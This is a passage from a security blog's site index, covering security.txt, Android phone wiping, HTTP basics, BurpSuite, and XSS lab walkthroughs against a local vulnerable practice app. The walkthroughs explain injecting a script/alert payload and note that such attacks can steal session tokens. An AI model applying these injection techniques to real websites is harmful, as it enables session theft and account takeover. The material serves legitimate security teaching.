report them without fear of legal reprisal. This article will discuss what security.txt files are, how they work, why your business/owner of the website should care about adopting them, and more!\nWhat is a security.txt file? # It is one of the proposed website standards that allows owners and security researchers to work more closely to report any identified security issues.\nThis \u0026ldquo;security.txt\u0026rdquo; file is a new open standard and still in the draft stage, used by website administrators, bug bounty hunters, and other security researchers who want to share information about discovered vulnerabilities with website owners in an organized manner.\nHow does security.txt work? # If you are the site owner, you list contact information for reporting vulnerabilities (such as an email address and PGP key) in your security.txt file, and researchers can use this information to report any issues they find privately. By doing this, you make it easier for researchers to report vulnerabilities.\n\u0026ldquo;security.txt\u0026rdquo; is generally placed on your website at \u0026ldquo;https://www.example.com/.wellknown/security.txt\" Here are the example contents of the security.txt file.\nFigure 1: : Sample security.txt file Why should you care about security.txt? # A common phrase in the security industry is, \u0026ldquo;Security is only as strong as the weakest link.\u0026rdquo; A single security bug is more than enough to compromise the complete chain.\nThe website owner might ensure all the necessary steps to protect their online asset from all malicious actors.\nThe security vulnerabilities are like the \u0026ldquo;Cat and Mouse\u0026rdquo; story as the developers continuously work in a fast-paced agile environment to deliver value to the customers in a shorter time, where some security issues might go unnoticed.\nHowever, if an attacker can find and exploit a vulnerability on the website that was not patched or adequately addressed, it can potentially do much damage.\nAs a site owner, you should care about adopting security.txt files because they can help make it easier for researchers to report vulnerabilities to you privately and securely. This can help protect the researcher and your website from legal repercussions if the vulnerability is not reported responsibly.\nAdditional Benefits: # Information about the organization\u0026rsquo;s secure disclosure policy can be stated so that researchers can look at and comply to the best extent.\nThe security.txt file helps information to communicate directly with the respective security team, who is already familiar with the reported topic.\nSecurity researchers can also understand what part of the website is in scope for testing and what is not part of the scope.\nAcknowledgments for all the previously reported security researchers.\nLinks to job references if the organization seeks a security analyst or red team expert.\nIt is easy! You can create a security.txt file using this handy tool: https://securitytxt.org/#generate\nReferences # https://en.wikipedia.org/wiki/Security.txt https://securitytxt.org/ - Template Generation https://github.com/securitytxt/security-txt ","date":"6 January 2022","externalUrl":null,"permalink":"/the-importance-of-a-security.txt-file/","section":"Posts","summary":"","title":"The Importance of a Security.txt File","type":"posts"},{"content":"Are you thinking of selling your smartphone, or would you like to give your phone to family members or friends?\nIf yes, then let\u0026rsquo;s get started. A few checks need to be done before you give it away.\nToday\u0026rsquo;s smartphones contain more than call records and messages.\nI use my mobile phone for communication purposes, to perform payment transactions, to capture beautiful moments, to keep updated on exciting topics, for entertainment, to organize myself, to shop, etc.\nAs information accumulated on our mobile devices for months/years, it would be worth reviewing it before giving it away.\nBackup Data # As of today, most users prefer to store information in their respective cloud user accounts. Still, it would be better to re-verify and ensure all the data synchronization is up-to-date.\nNavigate to Settings \u0026ndash;\u0026gt; Accounts \u0026ndash;\u0026gt; Select your primary sync Gmail account \u0026ndash;\u0026gt; Check Sync on for all items enabled.\nFollowed by verifying when was the last sync performed. Click on account preferences as shown below and select Account Sync status.\nThe rest of the users who would like to keep the data locally can connect the phone to a Laptop/Desktop and copy all the data to a local drive.\nPlug the USB charging cable into your device and select File Transfer/Android Auto by clicking on the USB Preferences in the notification bar.\nAfter connecting the device, the system will auto-detect and mount the shared folder to your operating system. Once opening the folder, all the files will be displayed, as shown below.\nEnsure all the critical data is copied onto the local storage.\nA general rule in information security is to keep at least two backups so that even if one backup fails in an unexpected scenario, the second backup copy helps restore your data.\nUnlink your Google Account # Once all the data of calls, messages, documents, etc., are backed up, the next step is to log into your Google account and remove all the links associated with the mobile device.\nThis can be done from a mobile or from the web browser too. Go to Gmail \u0026ndash;\u0026gt; Accounts \u0026ndash;\u0026gt; Security \u0026ndash;\u0026gt; Your Devices.\nSelect the phone you want to remove, click on Sign Out, and remove your Google account from the phone.\nThis is an important step, if it is missed the new owner of the phone might have trouble in logging into the device as the previously used gmail account is needed to unlock it. Reset and erase all data. # Now it\u0026rsquo;s time to reset and erase all the data. We can wipe out all settings, data stored on the device, etc.\nRe-think and ensure you are not losing any important data. Navigate to Settings \u0026ndash;\u0026gt; System \u0026ndash;\u0026gt; Reset Options \u0026ndash;\u0026gt; Erase all data (factory reset)\nNow the phone wipes out all the data on the device and will boot up.\nif you are able to easily recognize your usage patterns on screen, like pin code or pattern then would recommend cleaning up so they cannot guess your password. (this is generally for those who use the common passwords for multiple devices/accounts) Even after factory reset, if you are paranoid about your data on device, you can encrypt it again and reset the device as shown above. Remove SIM \u0026amp; Memory Cards # Once you are confident that all the above steps are ensured, the last step would be to remove your SIM card and memory cards, if any.\nIf you use a carrier-connected device, work with your vendor to deactivate the service and ensure all pending bills are paid.\nI hope you find the above article helpful!\n","date":"2 October 2021","externalUrl":null,"permalink":"/things-to-do-before-giving-away-your-smartphone-android/","section":"Posts","summary":"","title":"Things to do before giving away your smartphone (Android)","type":"posts"},{"content":"Welcome back to learning Cross-Site Scripting (XSS) vulnerability with the Kurukshetra app built by d4rk36.\nThis post will start with what an XSS vulnerability is and then will try to analyze the XSS challenges on the vulnerable app.\nEnsure your lab is up and running if you have not set up your lab yet.\nWhat is Cross-Site Scripting? # Cross-site scripting is also referred to as \u0026ldquo;XSS.\u0026rdquo;\nCross-site scripting is an application flaw that takes a malformed input from the client (i.e., Browser or Proxy) and the server without verifying appends, then sends the input as it is back in an HTTP response without proper validation.\nIf you are not familiar with what HTTP is, check out the following HTTP Basics Tutorial to help you get started.\nThe malformed input lets an attacker inject malicious code(like HTML or JavaScript ) into the server\u0026rsquo;s HTTP response and can change the application\u0026rsquo;s behavior.\nXSS vulnerability can be used to deface the landing pages of websites, which is called defacement. Stealing user sessions and gaining access to user accounts. Secretly log and monitor the victim\u0026rsquo;s keystrokes, Control the victim\u0026rsquo;s web browser, retrieve user-saved passwords from the browser, Or even redirect victims to a malicious page, and much more.\nAdditionally, XSS, combined with other security vulnerabilities, makes the attack more severe.\nIn total, there are three types of XSS vulnerabilities, as detailed below.\nFigure 1: Types of Cross-Site Scripting Vulnerabilities Stored XSS - Walkthrough # After setting up the lab, Visit http://localhost:8066. The vulnerable Kurukshetra application should be loaded as shown below.\nFigure 2: XSS Vulnerable Kurukshetra App - Challenge 1 Take some time to understand how the application functionality works before we start assessing.\nTry adding a simple \u0026ldquo;HelloWorld\u0026rdquo; string, and check how the input is appended to the below comments.\nFigure 3: Understaing how the application behaves with user input From the above behavior, we can understand that the given input is stored and displayed back.\n💡 This is one of the signs where you can check if it can accept any malformed input as well. Let\u0026rsquo;s go ahead and try out the classic XSS payload.\nFigure 4: Class XSS Snippet *\u0026lt;script\u0026gt;* tag in HTML is used to extend the page capabilities and include interactivity, which will be used to test if it is possible to inject the code snippets.\nalert() function in JavaScript is used to display the popup window.\nI will insert the script code to make things visually appealing, as displayed in the image below. When we see the popup window, it means our script code got injected and executed successfully.\nFigure 5: Inserting XSS Payload Inject the script code in the input field and click the \u0026ldquo;Submit\u0026rdquo; button.\nImmediately, a popup message will be displayed, as shown below, to confirm our script execution.\nFigure 6: XSS alert pop-up Click the \u0026ldquo;OK\u0026rdquo; button, and the application usually loads the page.\nTo further understand our script injection, Right-click, select \u0026ldquo;View Page Source,\u0026rdquo; and then search for the above-injected script code.\nFigure 7: XSS Script Code in HTML Response The script code was injected as it was given. This confirms we could inject the malformed script code in the user input field.\nRevisit the following page: http://localhost:8066/ch01.php. Observe the popup message will be displayed again.\nThis is what a stored cross-site scripting vulnerability is. Once the malformed input is injected, it will be executed every time the page is loaded. If multiple users are using the same application, then the script code will also be executed for each and every individual victim as well.\nAttackers can use the above type of functionality to deface the page and completely change it based on malicious intent using JavaScript and HTML code. Similarly, write a malicious piece of code to steal all the authenticated users\u0026rsquo; session tokens and reuse it for accessing the user\u0026rsquo;s account without passwords. Or even redirect victims to a malicious page, etc.\n🎉 This type of behavior is called Stored Cross-Site Scripting vulnerability. Yay! We found a stored cross-site scripting vulnerability and solved XSS Challenge 1.\nAbout XSS Payloads # The above example demonstrates a simple XSS code snippet.\nYou might be wondering how I would ever be able to create those script payloads, and I am not even familiar with JavaScript and that stuff.\nWell, lots of security researchers have already done most of the work related to payloads for you. You all need to know when to use it and what needs to be changed based on your scenario. As the experience grows, you will be able to write your own custom payloads for yourself.\nHere is a repository of \u0026ldquo;PayloadsAllThings\u0026rdquo; that you might need to bookmark it.\nYou will find a lot of information on different vulnerabilities and their payloads. Just search for \u0026ldquo;XSS Injection\u0026rdquo;.\nGo ahead and try out with a wide range of XSS payloads and see how the application behaves.\n💡Practice Makes perfect.\nClean up - XSS Data # It might become annoying if we keep getting too many popups, which can even impact usability.\nClick on the \u0026ldquo;Purge Database\u0026rdquo; button to eliminate the annoying popups and start fresh.\nFigure 8: Clean up all annoying warnings with - Purge Database Conclusion # I hope you learned about the different types of cross-site scripting vulnerabilities. Organizations are using the most secure coding frameworks and best practices, but they might still miss out due to complex application ecosystems, which can give way to XSS vulnerabilities. The above example demonstrates how improper coding practices can be used to exploit stored XSS vulnerabilities, and fixing them as soon as possible as part of security assessments can reduce the huge impact on production systems.\n","date":"13 December 2022","externalUrl":null,"permalink":"/challenge-1-stored-cross-site-scripting-attack/","section":"Posts","summary":"","title":"Challenge 1 - Stored cross-site scripting attack","type":"posts"},{"content":"In this post, we will walk through BurpSuite and start learning the concepts that we will be using, and I will be covering more about the features when needed during our assessments.\nIf you haven\u0026rsquo;t installed the Burp Suite, refer BurpSuite Installation and ensure the tool is successfully installed.\nOverview # Let\u0026rsquo;s launch the BurpSuite community edition using the steps from BurpSuite Installation guide.\nAt launch, the \u0026ldquo;Learn\u0026rdquo; tab will be selected and all the information required for learning and using the tool will be displayed as shown below. You can always explore the text and video tutorials provided by the tool.\nFigure 1: BurpSuite Communtiy - Learn Tab Dashboard # A place where you can see information about the crawling and issues identified.\nFigure 2: BurpSuite Dashboard Tasks section is a place where we can configure crawling for all websites we visit and keep an eye on their status. By default, the tool helps us by enabling \u0026ldquo;Live passive crawl\u0026rdquo;.\nPassive crawl means when I visit any website using the Proxy tool, it starts looking at all the HTML content and collects page URLs, parameters, etc. keeps building the sitemaps locally for our knowledge base.\nThis is similar to the daemon service, it will keep on continuously running from the start of the BurpSuite tool, you can disable it by setting the \u0026ldquo;Capturing\u0026rdquo; off.\nEvent Log section gives you information about the BurpSuite tool itself like services started, error information if it is unable to load any extender plugin, network issues, and warning about the tool which might impact your work.\nIssues Activity is a place where the BurpSuite scanner will display all the vulnerabilities identified by the tool\nIssues Information section where you can see a detailed description of the security bug reported and the proof of concept of how the tool was able to identify it as a security defect.\nThe above issues sections are only available in the BurpSuite Professional edition.\nTarget # The target tab consists of three items, site map, scope, and issue definitions.\nSite map is the place where you can see all the URLs, and parameters information collected by the crawler. As we can only see the status in the dashboard, here you can find the detailed information post crawling of websites.\nFigure 3: BurpSuite Target Scope is the most important section while performing any security assessments or pentesting.\nBe very clear about which particular websites are part of your scope for security testing, and add them to the \u0026ldquo;In Scope\u0026rdquo; section. (Example: securityarray.io as in scope)\nAnything which is not supposed to be tested on a particular website excludes all of them from testing by adding it to the \u0026ldquo;Out of Scope\u0026rdquo; section. (Example: payments.securityarray.io)\nAlways keep in mind, that only perform security testing on the scope mentioned to you. Violating the terms and conditions of the scope of your assessments will lead to banning you, or sometimes you might face legal challenges from the owners of the website.\nIssue definitions are like a vulnerabilities inventory of BurpSuite about all the vulnerabilities it can identify. The security defects are all categorized from informational to High severity.\nThis is also a good place to keep referring to vulnerabilities information.\nProxy # This is the core feature of the BurpSuite tool.\nIn short, once you configure the BurpSuite proxy with your web browser, Any traffic which goes from your web browser to the web server will be viewable in your BurpSuite proxy tab.\nNot only view, but you can also intercept and modify any request before it goes to the server.\nGenerally, the browser limits our capabilities to only view the HTTP messages for debugging purposes, by using this proxy tool as an intermediate you can overcome those limitations\nFigure 4: BurpSuite Proxy In security, we often keep on saying \u0026ldquo;Validate every piece of data which is coming from the client side\u0026rdquo;. As it can be tampered with.\nFigure 5: BurpSuite Proxy Enabled After launching the BurpSuite tool, the first thing to ensure your proxy listener is started and in a running state.\nNavigate to the \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Options\u0026rdquo; ⇾ \u0026ldquo;Proxy Listeners\u0026rdquo;. As shown in the above screenshot.\nHTTP History is a location where all the ongoing HTTP traffic information can be viewed.\nIntercept tab is where you have the option to enable for all or each request you want to change before sending to the web server, or turn it off if you don\u0026rsquo;t want to modify any requests.\nBy default, the intercept feature is enabled at startup.\nNavigate to the \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Options\u0026rdquo; ⇾ \u0026ldquo;Intercept Client Requests\u0026rdquo;. As shown in the above screenshot.\nYou would be able to see the Intercept requests enabled, and the rule set of what all requests the Burp Proxy will intercept.\nSimilarly, we can enable the intercepting of responses as well if you want to see it in the proxy itself.\nAdditionally, the Intercept tool also does contain an inbuilt Chromium browser which is preconfigured.\nFigure 6: BurpSuite Intercept Browser Launch the browser and start accessing any website, you should be able to see all the data being seeded into your BurpSuite Proxy.\nIn short, the takeaway from the proxy tool is to configure with any web browser, and we can start playing with the requests sent from the client to the server.\nIntruder # This is one of the best features of the BurpSuite. Let\u0026rsquo;s say you are having a situation where you need to test whether the application is using the default username and passwords for the server.\nYes, we do consider it a security bug if you use the default username and passwords on the server. Because anyone on the internet can guess it.\nIf our list of default usernames/passwords is less than 10, probably you can do it manually. But what if it\u0026rsquo;s 100+ and beyond?\nBurpSuite intruder is a big savior here. All, we need is to load the HTTP request, choose where you need to inject the modified values, set the payloads list (usernames or passwords list), and fire. That\u0026rsquo;s it!\nIntruder itself is a very big concept, which we will be covering in upcoming articles.\nFor now, all you need to remember is we can fine-tune custom payloads and reduce our manual efforts at the time of security testing for various scenarios using intruder.\nRepeater # Based on the tab name, you could have probably guessed it is used to send repeated instructions!\nFor example, you are testing a Password Strength functionality where you need to check if accepts only small characters, or only numerics or passwords with lengths less than 5, etc.\nHere, we can do this from a web browser by accessing the application interface. But, don\u0026rsquo;t you think it\u0026rsquo;s too repetitive to always reload the page and enter a value, click submit and observe results?\nYes, the repeater saves us a lot of time. Just capture any request message and modify it before sending it to the server. You can see the response in the repeater tab itself. This saves us a lot of time when sending repeated requests.\nSequencer # As the name suggests, it is used to analyze a large sample of tokens to see whether it is predictable or completely randomized and unpredictable.\nFigure 7: BurpSuite Sequencer In general, this is used for analyzing the session tokens to find if it is predictable. If you can predict what the next session token will be set by the server, then this is considered a security flaw.\nLive capture helps you to capture each request directly by interacting with the web server. Whereas Manual load is a place where you can give samples of the tokens you have collected for analyzing the strength of the tokens.\nDecoder # You encountered a type of encoded hash and are not sure what type of hash it is and how to decode it during assessments. We even have a way to decode/encode it using the decoder tool.\nFigure 8: BurpSuite Decoder Start by using the \u0026ldquo;Smart decode\u0026rdquo; option, which will figure out the type of encoding and decodes it to plain text.\nBurpSuite decoder currently supports URL, HTML, base64, ASCII hex, hex, binary, octal, and GZIP encodings as of today.\nComparer # Comparer lets you view the differences between the two messages of what was modified and what was added newly.\nFigure 9: BurpSuite Comparer Logger # Logger displays all the communication information between your BurpSuite tool set and the target website.\nFigure 10: BurpSuite Logger Extender # BurpSuite extender gives additional superpowers to expand the capabilities of the current toolset.\nFigure 11: BurpSuite Extender BAppStore is a list of plugins inventory that is provided by portswigger as well as from the security community.\nAPIs provide us the capability to add custom functionalities based on requirements.\nExtensions tab provides you with information about all the extensions which are enabled and their output.\nProject options # Let\u0026rsquo;s say I want to automate the set of sequential operations which need to be performed with less manual effort. Can I do it?\nYes, you can do that using Macros.\nFigure 12: BurpSuite Project Options Project options provide you with a lot more benefits to tweak session handling rules, how and where the cookies are maintained, Macros to repeat a sequence of actions based on rules, HTTP communication preferences, etc.\nTo save all the changes, navigate to the \u0026ldquo;Project\u0026rdquo; menu item ⇾ select \u0026ldquo;Project options\u0026rdquo; ⇾ \u0026ldquo;save project options\u0026rdquo;.\nSimilar way, you can load the saved options using \u0026ldquo;Load project options\u0026rdquo;.\nUser options # These are settings specifically for the user who uses the BurpSuite.\nFigure 13: BurpSuite User Options Some options where we are tweaking repeatedly while launching BurpSuite, probably there is a way to save that setting and use it whenever you launch the tool rather than configuring it every time.\nSay, you want to change the Interface to how it looks better for you or update shortcut keys, change temporary file location, update communications information, etc.\nAll about how you want the tool to behave can be updated here.\nLastly, to save all the changes, navigate to the \u0026ldquo;Burp\u0026rdquo; menu ⇾ select \u0026ldquo;User Options\u0026rdquo; ⇾ \u0026ldquo;save user options\u0026rdquo;. Using the same way, you can load the saved options using \u0026ldquo;Load user options\u0026rdquo;.\nSummary # Well, we have covered a good amount of information about the different sections available in the BurpSuite tool.\nI hope, by now, you are familiar to navigate and choose different tabs based on requirements.\n","date":"29 July 2022","externalUrl":null,"permalink":"/burpsuite-overview/","section":"Posts","summary":"","title":"BurpSuite Overview","type":"posts"},{"content":"Discover the internals of HTTP with the following beginner\u0026rsquo;s tutorial. If you are new to information security or getting started in web application security, this post will walk you through the HTTP basics and foundations needed.\nIntroduction to HTTP and its importance # HTTP, which stands for \u0026ldquo;Hypertext Transfer Protocol\u0026rdquo;, is the foundation used for data communications on the World Wide Web. In simple words, this protocol lets communication between our web browser and web servers.\nUnderstanding the HTTP is crucial for anyone who is interested in getting into security testing. It is a basic foundation for all the data communication on the internet. Knowing about the HTTP Requests, Responses, and Status Codes will help us to understand more about a web application and its behaviour during the security testing process and even help us automate repetitive manual work.\nWhat is HTTP? # HTTP is a protocol with a set of defined rules for communicating between the client and the server. Think of it like this: we humans use a common language to speak and communicate with each other. Similarly, the protocol is to communicate with the client (Example: Web Browser) and the server (Example: Apache HTTP).\nOur modern web browsers hide this complexity by taking care of them and loading beautiful web pages for us to be easy to read and understand.\n💡On the web, all I see is HTTPS. Yes, you are right. The working principle is the same, with few changes. Will cover those as well. HTTP is text based protocol # HTTP is a simple message-based request/response protocol. When the user requests a web page, the browser sends the HTTP request to the server in the background, which then responds with the requested resources. The website responds back with the requested resource, which is called response.\nHTTP acts as a medium through which information is exchanged. It allows the transfer of various types of data, including text, images, multimedia files, etc.\nStructure of HTTP Requests and Responses # A sample of HTTP request-response can be seen as shown below:\nRequest:\nFigure 1: : Sample HTTP Request by Client Response:\nFigure 2: : Sample HTTP Response form Server I can see this is a lot of data to digest, don\u0026rsquo;t worry, with the overwhelming information you see on the response screenshot. You don\u0026rsquo;t need to remember everything. This is to get you acclimated to the type of data you\u0026rsquo;ll see from now on and focus only on what we need the most.\nWe will come back to technical in a bit. Let\u0026rsquo;s go ahead and learn more about HTTP.\nHTTP is a Stateless Protocol # As the name suggests, the stateless protocol does not maintain the state of a transaction. Stateless protocols are typically used in low-level communication applications, where data packets can be sent without any notifications. An example of a stateless protocol is TCP.\nThis means you get the response back once a request is sent and the connection closes. It will not be able to link or relate to any previous requests.\nExample of HTTP/1.0 and below versions # $nc demo.testfire.net 80 GET / HTTP/1.0 Host: www.demo.testfire.net HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DF622CC21A2727AC5DD745D1A5B007BF; Path=/; HttpOnly Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 27 Jul 2022 07:48:18 GMT Connection: close I am using a tool called net cat (nc) here to demonstrate a stateless example by sending the custom request and waiting for the response from the server. If you observe closely, the server sends the last line Connection: close.\nConnection: header above tells that the TCP connection can be closed once after sending the HTTP response.\nBut from HTTP/1.1 and above, the TCP connection will not be closed and will wait for the next request to be received and processed.\n$ nc demo.testfire.net 80 GET / HTTP/1.1 Host: demo.testfire.net HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D7190756165E5E1B4986094B7A17630F; Path=/; HttpOnly Content-Type: text/html;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Wed, 27 Jul 2022 07:54:31 GMT In the above request/response, you can see the Transfer-Encoding: chunked, which means the connection is not closed, and it is waiting for the next request to process.\nTransfer-Encoding: header is used to specify the type of encoding used on the data sent in the message body in a series of chunks.\nFor now, remember that the above concepts will be helpful while discussing advanced HTTP attacks.\nFigure 3: : HTTP vs HTTPS HTTP vs HTTPS # HTTP (Hypertext Transfer Protocol) and HTTPS (Hypertext Transfer Protocol Secure) underlying working concepts are similar. HTTPS is a secure version of HTTP that uses SSL or TLS security certificates.\nThe HTTP protocol is outdated and not secure. The HTTPS protocol is more modern and has encryption codes to protect user information.\nA few of the drawbacks of HTTP are detailed below:\nHTTP transmits messages in clear text, meaning that anyone on the network can view all of your requests, responses, and sensitive information like usernames, passwords, and card information. Not only above, if your data goes through any of the Proxy connections, then a copy of your request and response is also stored now on the proxy server. How the admin uses the information is beyond our control, and it would be hard to track the attacker. In some browsers where the cache is enabled, the copy of your request will also be in the cache. This is challenging when the session token or sensitive information is passed in the URL. This is where HTTPS protects us with privacy and integrity from all kinds of snooping or Man in the Middle (MITM) attacks.\nLastly, the default port for HTTP is 80, and HTTPS is 443. It can also be changed based on requirements.\nBreakdown of the HTTP components # Let\u0026rsquo;s dig a bit deeper and learn more about the HTTP syntax, methods, and headers. This section helps us in reviewing request-response messages and confirm whether vulnerability exists or not.\nTake some time to understand and get well acquainted.\nHTTP Syntax # We came to understand that HTTP is a simple message-based protocol that contains request and response messages.\nLet\u0026rsquo;s try to understand more about the request.\nA Typical Request Message: # Figure 4: HTTP Request Sections HTTP request contains two sections, Headers, and Body. The header and body are separated by an empty line.\nThe body section can vary based on the type of HTTP method. For example, the GET HTTP method doesn\u0026rsquo;t contain any body information, but the POST method does contain.\n1. Headers:\nPOST /members/api/send-magic-link/ HTTP/2 In the above line, the first one POST is called a verb. It\u0026rsquo;s one of the HTTP methods commonly used for posting data onto the server.\nFollowed by the URL path members/api/send-magic-link, the page which the client is trying to access/post.\nLastly, HTTP/2 is the protocol and its version used for communication.\nEach header in the message body is placed on a separate line. The next header is Host.\nHost: securityarray.io Host header contains the domain name of the server to whom the request must be sent.\nNext, followed by other headers.\n2. Body:\nHTTP Body section contains the additional supporting information for the above-specified POST header information. Below is an example of the JavaScript Object Notation (JSON) type of data passed to the server in the message body.\n{\u0026#34;name\u0026#34;:\u0026#34;Raghu\u0026#34;,\u0026#34;email\u0026#34;:\u0026#34;example@securityarray.io\u0026#34;,\u0026#34;requestSrc\u0026#34;:\u0026#34;portal\u0026#34;} The message body can also be plain text or HTML or XML data based on the type of content being transmitted.\nA Typical Response Message\nFigure 5: HTTP Response HTTP Response message will look similar to the above, containing the Headers and Body separated by an empty line.\nHTTP/2 201 Created The first line specifies the server acknowledgement back to the client using HTTP/2 protocol, and the next 201 is a status code specifying the type of action taken by the web server for the request sent.\nHere, it has created the content on the server. Therefore, we received 201 Created.\nBy this, I can confirm the content I have posted is created on the server, and it acknowledges back, followed by other HTTP headers and message body, and next if any.\nThe HTTP message body is later beautified and displayed back to the user on a web browser in a human-readable way.\nFigure 6: : HTTP Methods HTTP Methods and Its Purpose # The methods indicate the purpose for which the client has initiated the request and what is expected by the client to consider it a successful result.\nLet\u0026rsquo;s walk through the different HTTP methods available.\nGET is used to retrieve the resource from the web server, and it doesn\u0026rsquo;t contain a message body. The URLs that you observe in the browser URL bar are all GET requests. HEAD is very similar to the GET, but it only sends the header section. POST method performs a specific operation with the provided message body. Like creating or updating. It is recommended to use POST for sending sensitive information like username, password, card info, etc. As the message body cannot be seen by intermediate resources like proxies. PUT is most commonly used for updating the data and also for uploading the content to the server. DELETE is used to remove a resource on the server, which is allowed only for users with authorized privileges. CONNECT is used to establish a tunnel to the server OPTIONS is used to request a list of HTTP methods enabled on the server. TRACE is used for diagnostic purposes. Whenever you send a request using TRACE, you should be able to see the same contents in response as were sent in the request. Figure 7: HTTP Headers Understanding HTTP Headers # In HTTP, there are many headers, each intended for a specific purpose. We will be covering some headers, and if you would like to learn about the complete list of headers, the best source is RFCs (HTTP/1.1, HTTP/2)\nSome headers you can observe in both Request and Response are given below.\nContent-Length specifies the length of the message body in bytes.\nContent-Type specifies the type of content present in the message body.\nRequest headers # User-Agent specifies the information about your browser or from other clients from which you are trying to access the web server.\nOrigin is used to specify from where the request originated.\nReferer is used to specify the request from which the current URL originated.\nAuthorization is a token used to pass to the server for accessing privileged resources.\nAccept headers inform the server about content types accepted by the client.\nAccept-Encoding informs the server about encoding types understood by the client.\nResponse Headers # Set-Cookie is used to set the session cookies on the client side to identify the sessions and user accounts used for accessing server resources.\nAccess-Control-Allow-Origin indicates whether the resource can be retrieved via cross-domain Ajax requests.\nCache-Control passes the instructions to the browser about how the cache must be handled.\nFigure 8: Status Codes Decoding HTTP Status Codes # The status codes are used to inform the client about how the request was handled. The server acknowledges back with the three-digit numerical codes of how it was processed.\nGetting familiar with status codes helps you to review and take action while performing security assessments.\nFigure 9: HTTP Status Codes Let\u0026rsquo;s look at common status codes which we will be encountering day-to-day.\n100 Continue message sent by the server to continue and keep sending the message body. Once completed, the server will respond with another status message.\n200 OK means that the request was successful and that the response body contains the result of the request.\n201 Created is returned in response to a PUT/POST request to indicate that the request was successful and created.\n301 Moved Permanently redirects the browser permanently to a different URL. So the client should use the new URL going ahead in the future.\n302 Found redirects the browser temporarily to a different URL\n304 Not Modified specifies the browser to use the cached copy as the client has the latest data of the server.\n400 Bad Request is a client error that indicates that the client submitted an invalid HTTP request.\n401 Unauthorized indicates that you need to be authenticated to access the server resource.\n403 Forbidden indicates that you do not have privileges to access the resource on the server.\n404 Not Found means the requested resource is not present on the server.\n405 Method Not Allowed means the specified HTTP method in the request is not supported for the given URL.\n500 Internal Server Error indicates that the server is unable to process your request, which might be because of some unhandled error within the server application.\n503 Service Unavailable is displayed when the server is handling a heavy load and is not able to function. Also, during maintenance hours, or during migration, or even in case the server crashes.\nConclusion # I hope this short tutorial has provided the foundations for understanding HTTP protocol and its significance in terms of application security. It\u0026rsquo;s a lot of information to digest and remember. You could use this as a reference to get started, and surely, this is going to help us make better decisions while carrying out security assessments.\nI encourage you to continue exploring the HTTP RFCs (HTTP/1.1, HTTP/2, HTTP/3) for in-depth understanding.\nRemember, learning web application security is an ongoing journey, and each step you take brings you closer to mastering this valuable skill.\nKeep exploring!\n","date":"26 July 2022","externalUrl":null,"permalink":"/http-basics-tutorial/","section":"Posts","summary":"","title":"HTTP Basics Tutorial","type":"posts"},{"content":" I have feedback on your post # Great! I am happy to take up any constructive feedback which can help in improving the website and content.\nYour content is misleading # Sometimes mistakes do happen, but don\u0026rsquo;t worry. Just let me know where things went wrong so i can fix it. Together we can make the website better!\nI would like to request a new topic? # You are most welcome to share any application security topic which you would like to learn more about.\n","date":"13 January 2022","externalUrl":null,"permalink":"/faqs/","section":"SecurityArray","summary":"","title":"FAQ's","type":"page"},{"content":"Welcome back to learning Cross-Site Scripting(XSS) vulnerability with the Kurukshetra app built by d4rk36.\nIn this article, we shall learn about the reflected XSS and how it differs from the stored XSS.\nBefore we start, ensure the lab is running if you have not set up your lab yet.\nTypes of Cross-Site-Scripting (XSS) # How Reflected XSS Work? # The server processes the malicious input code supplied from the client side, and the same malicious code is injected and then returned to the client in an HTTP response without proper validations.\nThe browser renders the response content, assuming it was supplied by the application server, which can be trusted, and the injected malicious code also gets executed.\nThe significant difference that can be observed when compared to stored cross-site scripting is, in reflected XSS, the malicious code is just appended back in the HTTP response and executed immediately. It is not stored anywhere in the database.\nFor the same reason, the impact of reflected XSS is reduced compared to the stored cross-site scripting vulnerability.\nPracticals - Reflected XSS # Post setting up the lab, visit http://localhost:8066. The application should be loaded as shown below and Navigate to \u0026ldquo;XSS Challenge 2.\u0026rdquo;\nFigure 1: Kurukshetra XSS Challenge 2 Page Before you start assessing, take some time to understand how the application functionality works.\nLet\u0026rsquo;s go ahead and give it a try with the similar payload used in the stored XSS.\nFigure 2: XSS Payload Once appending the payload, click the \u0026ldquo;Submit\u0026rdquo; button, as shown in the screenshot below.\nFigure 3: XSS Payload Injection Immediately observe the alert pop-up message, which will be displayed below.\nFigure 4: XSS Payload Alert Message Click \u0026ldquo;OK\u0026rdquo; and observe the page loads normally.\nTo verify and confirm the vulnerability, right-click and select \u0026ldquo;view page source\u0026rdquo; and search for the above-injected payload.\nFigure 5: XSS Payload HTML Code Verify The proof-of-concept script code aligns correctly with the HTML response received, and all the characters are displayed back as given in the input field.\nYay!! Now, we can confirm we have successfully exploited the reflected XSS.\nNow, a point to remember here is that as this is not stored in the database, it gets executed only when the malicious code is injected. At all other times, the application usually behaves as expected.\nIn Stored XSS, the malicious payload gets executed whenever any user visits the injected application functionality.\nSummary # This article covered how to identify reflected XSS and how it works, including reusing the same XSS payload without much tweaking.\nKeep learning!! :D\n","date":"4 January 2023","externalUrl":null,"permalink":"/challenge-2-reflected-cross-site-scripting-attack/","section":"Posts","summary":"","title":"Challenge 2 - Reflected cross-site scripting attack","type":"posts"},{"content":"Thanks to all the contributors!\nImages \u0026amp; Icons # Unsplash Freepik Flaticon ","date":"26 July 2022","externalUrl":null,"permalink":"/credits/","section":"SecurityArray","summary":"","title":"Credits and Thanks","type":"page"},{"content":"Welcome back to learning Cross-Site Scripting(XSS) with the Kurukshetra. An app built by d4rk36.\nBefore we start, ensure the Kurukshetra lab is up and running if you have not set up your lab yet. Feel free to refer back to the below link.\nWe walked through stored and reflected XSS in a previous couple of articles. In today\u0026rsquo;s article with those foundations, let\u0026rsquo;s dive into the practical labs and start learning.\nPracticals - Reflected XSS # Post setting up the lab, visit http://localhost:8066 and ensure it\u0026rsquo;s accessible, then navigate to \u0026ldquo;XSS Challenge 3\u0026rdquo;.\nFigure 1: Kurukshetra XSS Challenge Page 3 Let\u0026rsquo;s try it with the XSS payload used in our previous articles and observe how the application behaves.\nPayload Try 1: Classic # Figure 2: Classic XSS Payload Output:\nFigure 3: Initial XSS Payload Result From the above observations, the application no longer gives pop-up messages but instead prints out the partial string from our given payload. Which indicates that our XSS payload is no longer working.\nTo evaluate further, click \u0026ldquo;View page source\u0026rdquo; to understand how our injected 